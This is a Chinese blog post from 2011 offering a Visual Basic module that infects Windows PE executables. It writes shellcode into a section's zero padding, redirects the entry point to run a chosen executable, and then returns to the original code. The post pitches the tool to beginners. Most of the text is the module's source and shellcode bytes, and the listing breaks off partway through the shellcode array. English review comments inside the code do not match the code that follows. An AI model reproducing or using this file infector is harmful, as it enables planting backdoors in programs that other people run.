

感染 PE 的代码--vb

时间:2011-10-25 20:11来源:未知 整理:寂涯网络 点击:

感染PE似乎是新手一个不敢涉足的东西,其实还是比较简单的,我偶尔看到了一个见缝插针的小程序,后来联想到了这个感染方式。

见缝插针的功能是把一个小后门(例如1KB以下的下载者等等)先写到目标程序的00区,然后继续在00去加一段代码调用kernel32._lwrite写文件和winexec执行,修改文件入口到这段代码,执行完毕后再跳回去。思路相当好,没有新加区段,PE文件大小也不变。但是缺点就是他调用kernel32的函数的时候用的是本机的函数内存地址,没有用搜索,所以只能在本机使用,换一个机子执行这个被感染的程序就根本不能执行。

这个方法感觉跟加花程序很像很像,我的想法就有了,找一段Shellcode(什么功能自己看着办),然后写到区段的00区,然后修改入口点到Shellcode ,执行完了再跳回原入口!Shellcode使用了寻址调用winexec函数,比上述的程序的通用性要高多了,下面这段代码中用的Shellcode是seer同学的,代码我也附上了。

为了新手的使用方便,我整理成了一个模块,调用函数InfectPE(要感染的文件,要运行的文件名)
注:因为Shellcode的原因,要运行的文件名不能大于12个字符  比如12345678.exe 不能再长了  代码执行成功的话返回值为1 ,并且在目标程序的目录下生成 目标文件名.exe的新程序,运行这个被感染的EXE就会运行当前目录下的12345678.exe了

感染PE的模块代码:


Attribute VB_Name = "ModInfectPE"
Option Explicit
' Module-level declarations for the PE patching module described in the article above.
' Only the declarations are visible in this excerpt; the routine that uses them (InfectPE)
' continues past the end of the listing.

' kernel32!RtlMoveMemory imported under the name CopyMemory: a raw byte copy between buffers.
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)

' Record type the module uses for one entry of the section table.
' NOTE(review): how these fields are populated from the file is not shown here; treat the
' field names as the author's labels, not as a verified on-disk layout.
Private Type SectionHeader
    Name As String * 8      ' fixed 8-character section name
    RVA As Long
    VirtualSize As Long
    PhysicalSize As Long
    Offset As Long
    flags As Long
End Type

' Length in bytes of the PatchCode buffer declared below (133).
Private Const NeededArea As Long = 133

' Module state shared with InfectPE: the target file image (PE), variables named after PE
' header fields, the parsed section table, and scratch values. Their actual use is outside
' this excerpt.
Dim PE() As Byte, e_lfanew As Long, NumberOfSections As Long, SizeOfOptionalHeader As Long, AddressOfEntryPoint As Long, NumberOfRvaAndSizes As Long
Dim EncStart As Long, EncEnd As Long, SectionTableOffset As Long, SectionTable() As SectionHeader, EntrySection As Long, PaddingArea As Long, tmp As Long
' Fixed-size byte buffer (indices 0 .. NeededArea-1) that InfectPE fills one element at a time.
Dim PatchCode(NeededArea - 1) As Byte

Public Function InfectPE(ByVal strTargetFile As String, ByVal strRunFile As String) As Long

On Error GoTo ERR: '设置错误陷坑

'感染的Shellcode
PatchCode(0) = &H60
PatchCode(1) = &H55
PatchCode(2) = &H83
PatchCode(3) = &HEC
PatchCode(4) = &H40
PatchCode(5) = &H8B
PatchCode(6) = &HEC
PatchCode(7) = &H55
PatchCode(8) = &H64
PatchCode(9) = &HA1
PatchCode(10) = &H30
PatchCode(11) = &H0
PatchCode(12) = &H0
PatchCode(13) = &H0
PatchCode(14) = &H8B
PatchCode(15) = &H40
PatchCode(16) = &HC
PatchCode(17) = &H8B
PatchCode(18) = &H70
PatchCode(19) = &H1C
PatchCode(20) = &HAD
PatchCode(21) = &H8B
PatchCode(22) = &H78
PatchCode(23) = &H8
PatchCode(24) = &H8B
PatchCode(25) = &H47
PatchCode(26) = &H3C
PatchCode(27) = &H8B
PatchCode(28) = &H54
PatchCode(29) = &H7
PatchCode(30) = &H78
PatchCode(31) = &H3
PatchCode(32) = &HD7
PatchCode(33) = &H8B
PatchCode(34) = &H4A
PatchCode(35) = &H18
PatchCode(36) = &H8B
PatchCode(37) = &H5A
PatchCode(38) = &H20
PatchCode(39) = &H3
PatchCode(40) = &HDF
PatchCode(41) = &H49
PatchCode(42) = &H8B
PatchCode(43) = &H34
PatchCode(44) = &H8B
PatchCode(45) = &H3
PatchCode(46) = &HF7
PatchCode(47) = &HB8
PatchCode(48) = &H47
PatchCode(49) = &H65
PatchCode(50) = &H74
PatchCode(51) = &H50
PatchCode(52) = &H39
PatchCode(53) = &H6
PatchCode(54) = &H75
PatchCode(55) = &HF1
PatchCode(56) = &HB8
PatchCode(57) = &H72
PatchCode(58) = &H6F
PatchCode(59) = &H63
PatchCode(60) = &H41
PatchCode(61) = &H39
PatchCode(62) = &H46
